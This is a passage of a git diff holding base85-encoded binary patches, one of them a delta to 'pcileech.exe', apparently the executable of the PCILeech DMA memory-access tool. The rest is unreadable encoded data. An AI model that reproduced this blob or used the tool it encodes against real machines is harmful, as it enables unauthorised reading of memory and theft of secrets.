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

diff --git a/pcileech_files/pcileech.exe b/pcileech_files/pcileech.exe
index 55d67b3e9b2b0afaa9e17edf0085e83f4013a9bf..ed332ad239eef298c3fbe6b9a9c3123ad8b2aa2a 100644
GIT binary patch
delta 62807
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
